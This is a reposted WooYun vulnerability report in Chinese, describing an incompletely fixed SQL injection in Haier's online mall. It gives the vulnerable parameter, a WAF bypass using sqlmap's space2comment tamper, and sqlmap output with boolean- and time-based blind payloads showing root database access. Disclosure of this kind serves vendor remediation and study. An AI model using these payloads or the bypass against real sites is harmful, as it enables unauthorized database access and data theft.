海尔商城某处漏洞修复不完善可再次注入(ROOT注入)

2017年4月22日04:06:44评论380 views字数 214阅读0分42秒阅读模式

摘要

2016-03-02：细节已通知厂商并且等待厂商处理中
2016-03-02：厂商已经确认，细节仅向厂商公开
2016-03-12：细节向核心白帽子及相关领域专家公开
2016-03-22：细节向普通白帽子公开
2016-04-01：细节向实习白帽子公开
2016-04-16：细节向公众公开

漏洞概要关注数(8) 关注此漏洞

缺陷编号： WooYun-2016-180065

漏洞标题：海尔商城某处漏洞修复不完善可再次注入(ROOT注入)

漏洞作者：路人甲

提交时间： 2016-03-02 12:03

公开时间： 2016-04-16 17:19

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 11

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： Mysql 注入

1人收藏

漏洞详情

披露状态：

简要描述：

漏洞修复不完善，可再次注入

详细说明：

code 区域

mask 区域*****oods_list&store_id=58&a*****

已经公开的sql注入漏洞,测试发现对一些特殊的单词和字符做了过滤处理，并且后台好像加了waf，可是注入依然存在，slqmap加上--tamper=space2comment就可以绕过了

sqlmap验证

当前用户

code 区域

sqlmap resumed the following injection point(s) from stored session:
 ---
 Parameter: store_id (GET)
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: act=goods&op=goods_list&store_id=55 AND 4136=4136&member_id=13951031005 &page=1
 
     Type: AND/OR time-based blind
     Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
     Payload: act=goods&op=goods_list&store_id=55 AND (SELECT * FROM (SELECT(SLEEP(5)))NMsd)&member_id=13951031005 &page=1
 ---
 web application technology: PHP 5.6.9
 back-end DBMS: MySQL 5.0.12
 current user: root@%

漏洞证明：

修复方案：

过滤完全

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：5

确认时间：2016-03-02 17:19

厂商回复：

感谢提交。

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞概要 关注数(8) 关注此漏洞

缺陷编号： WooYun-2016-180065

漏洞标题： 海尔商城某处漏洞修复不完善可再次注入(ROOT注入)

相关厂商： 海尔商城

漏洞作者： 路人甲